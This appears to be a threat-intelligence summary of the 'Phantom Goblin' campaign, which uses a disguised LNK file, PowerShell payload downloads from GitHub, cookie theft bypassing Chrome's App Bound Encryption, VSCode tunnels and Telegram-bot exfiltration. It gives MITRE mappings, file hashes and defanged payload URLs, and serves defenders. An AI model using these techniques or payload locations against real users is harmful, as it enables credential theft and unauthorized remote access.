FOCUS MODE
EXTRACT IOC
Threat Research

Phantom-Goblin: Covert Credential Theft and VSCode Tunnel Exploitation

Cyble
Phantom-Goblin: Covert Credential Theft and VSCode Tunnel Exploitation
A newly identified malware operation, named “Phantom Goblin,” utilizes social engineering to deceive users into executing a malicious LNK file that triggers a PowerShell script to download and execute additional payloads. These payloads enable the malware to extract sensitive data, maintain unauthorized remote access via Visual Studio Code tunnels, and exfiltrate the stolen data to a Telegram bot. Affected: Malware, Web Browsers, User Credentials, Informational Security

Keypoints :

  • Threat actors use social engineering to trick users into executing a malicious LNK file disguised as a PDF document.
  • The malware downloads and executes additional payloads via PowerShell from a GitHub repository.
  • It ensures persistence by modifying registry entries.
  • Browser cookies are extracted through remote debugging, bypassing Chrome’s App Bound Encryption.
  • A Visual Studio Code tunnel is established for unauthorized remote access.
  • Stolen data, including cookies and credentials, is sent to a Telegram bot for exfiltration.
  • Malware disguises itself as legitimate applications to evade detection.
  • Users are advised to avoid executing unexpected RAR, ZIP, or LNK files.
  • Robust endpoint protection and real-time threat detection are recommended to combat these types of attacks.

MITRE Techniques :

  • Initial Access (TA0001) – Phishing: Spear phishing Attachment (T1566.001) – Malicious RAR attachments containing LNK files delivered via spam emails.
  • Execution (TA0002) – User Execution: Malicious File (T1204.002) – Users execute the malicious LNK file disguised as a document.
  • Execution (TA0002) – Command and Scripting Interpreter: PowerShell (T1059.001) – The LNK file runs a PowerShell script upon execution.
  • Persistence (TA0003) – Registry Run Keys / Startup Folder (T1547.001) – Adds persistence entry under the HKCU hive in the RUN registry key.
  • Defense Evasion (TA0005) – Obfuscated Files or Information: Software Packing (T1027.002) – The downloaded payloads are packed with UPX packer.
  • Defense Evasion (TA0005) – Masquerading: Match Legitimate Name or Location (T1036.005) – Payloads mimic legitimate applications’ names.
  • Discovery (TA0007) – Process Discovery (T1057) – Uses tasklist command to discover running processes.
  • Credential Access (TA0006) – Credentials from Password Stores: Credentials from Web Browsers (T1555.003) – Steals saved credentials from browser files.
  • Credential Access (TA0006) – Steal Web Session Cookie (T1539) – Steals browser cookies from multiple browsers.
  • Lateral Movement (TA0008) – Remote Services (T1021) – Creates a VSCode tunnel for remote access.
  • Collection (TA0009) – Archive Collected Data (T1560) – Collected data is archived before exfiltration.
  • Command and Control (TA0011) – Application Layer Protocol: Web Protocols (T1071.001) – Uses Telegram BOT API for data transfer.

Indicator of Compromise :

  • [SHA-256] 7d5ab794de22ebc90099273f96708bb378f9c7e87c9f902ed526a977a0791f36
  • [SHA-256] 112aeabc6cc7e0cbc42e006c868ba538f39b50617fc652a129e399ae6005fa17
  • [SHA-256] afd9fb1dd236bc64bff766b0bac741371d618981bbc96b4b586a7d4a1e148d14
  • [URL] hxxps://raw.githubusercontent[.]com/eagle-1337/x/main/updater.exe
  • [URL] hxxps://raw.githubusercontent[.]com/eagle-1337/x/main/vscode.exe

Full Story: https://cyble.com/blog/phantom-goblin-covert-credential-theft/

Tags: LATERAL MOVEMENT, PAYLOAD, SOCIAL ENGINEERING, SPAM, WINDOWS, PASSWORD, PERSISTENCE, DISCOVERY